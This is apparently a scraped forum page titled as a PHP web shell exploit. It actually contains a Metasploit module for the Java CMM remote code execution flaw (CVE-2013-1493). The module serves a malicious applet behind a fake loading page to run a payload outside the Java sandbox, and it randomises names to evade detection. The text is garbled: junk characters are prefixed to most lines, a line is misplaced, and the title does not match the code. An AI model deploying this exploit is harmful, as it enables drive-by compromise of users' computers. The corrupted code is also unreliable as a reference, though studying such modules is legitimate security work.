STUNSHELL PHP Web Shell远程执行代码

admin

##

8 `6 {: v8 |. x( X# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require ‘msf/core’
0 I) _, h; _. I- a2 rrequire ‘rex’
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
; j9 l2 U5 I/ T3 @super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
+ r* W! c  P  `1 v% g‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
1 Y- N2 [) B% uarbitrary Java code outside of the sandbox as exploited in the wild in February
; M4 `* o. M: v7 W$ X; B9 b" Land March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
+ j1 y8 y( z" j2 u! f# }- gand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
0 C; R5 Q# Q/ c6 q. hsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
2 A5 C& D) K6 v! awarning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
$ _. J2 G3 Y, X8 a'juan vazquez' # Metasploit module (just ported the published exploit)
],
- j  X6 ?1 s. {‘References’ =>
$ K2 h/ P5 o: Q4 A1 e[
# |) }$ u& ?8 k* r5 Q[ 'CVE', '2013-1493' ],
# B6 Y0 s- v# O1 }6 S' \- L0 O3 P* }[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
9 e3 f7 k: w; R/ `5 ]9 K‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
% n5 i6 S: J! P5 x‘Targets’ =>
' |  J8 ]- E3 v* w/ ][
[ 'Generic (Java Payload)',
{
'Platform' => 'java',
5 ?0 `) H- R; E$ S; J: _  M'Arch' => ARCH_JAVA
}
$ U8 g9 W" ]  y! ^8 n6 `4 j],
: T* s3 C/ k8 i% s/ _( D[ 'Windows x86 (Native Payload)',
/ \+ R1 P) z3 O0 y3 w3 h% {{
9 w( E2 l9 K& B- [* @8 i9 r'Platform' => 'win',
'Arch' => ARCH_X86
, P' e; T3 z* h7 E}
: \+ E! e) g3 J7 y& a# X]
! k" c& K6 x, F: i],
1 P0 `' p1 z" b1 ?5 z" x‘‘DisclosureDate’ => ‘Mar 01 2013′
, b5 N/ ?" F9 x/ s$ e6 h; m9 J# W1 C))
. P& B! P7 |: H/ H4 @end
% ?; Z0 B+ o* }8 j1 Gdef setup
* c7 b2 r& Q/ ?2 ypath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
* e! C6 \6 U( J" t6 p8 p  ?9 c+ b* epath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
3 z, x7 s7 j! p  p4 c6 C@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
$ Q9 e' }+ E) l. u: ]0 ]@init_class.gsub!(“Init”, @init_class_name)
7 g- j( P9 h, u$ L* `" Nsuper
/ D! O. W: S2 |end
5 s- I  x5 c6 Kdef on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
case request.uri
6 e; c+ Z7 I) E) G& Z* ~' t  ^& Wwhen /\.jar$/i
- ^2 Z7 ^6 Q; f8 T4 rjar = payload.encoded_jar
( `: G6 Y/ q* tjar.add_file(“#{@init_class_name}.class”, @init_class)
" t3 @4 \& [* ]% [: o2 o& Q8 kjar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
5 ?) G& U: o; f( M& imetasploit_str = rand_text_alpha(“metasploit”.length)
  J/ s( j# r+ C5 [  C$ Hpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
* E: O9 ]# M( {/ Y9 Xentry.name.gsub!(“metasploit”, metasploit_str)
' E% w& v) v, l& n+ sentry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
/ j  N! S9 `  c3 p7 H}
8 k8 d/ C5 }- f  G% R% @jar.build_manifest
, w) q; @  o0 R6 V7 A2 k- lsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
payload = regenerate_payload(cli)
if not payload
7 k6 U8 n. W2 I. vprint_error(“Failed to generate the payload.”)
6 K% m) q: [$ z" Usend_not_found(cli)
6 v2 v4 ?% J" X: b/ P$ ~return
end
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
9 w- a8 e% f  S* _, Usend_redirect(cli, get_resource() + ‘/’, ”)
end
+ s4 @2 S) H% r# q4 y1 mend
8 v6 w6 [, C' ?2 V; j: Mdef generate_html
- y0 V/ n! D& {8 [1 k6 X" thtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
  U+ ]6 L# d$ k4 b0 ^html += %Q|</applet></body></html>|
, P/ O: A4 k0 a( O" X1 ]) Qreturn html
end
end
, C! K8 Q% P  d0 K* }- zend
6 `9 _! J1 q7 Q6 K3 w+ M, Y& k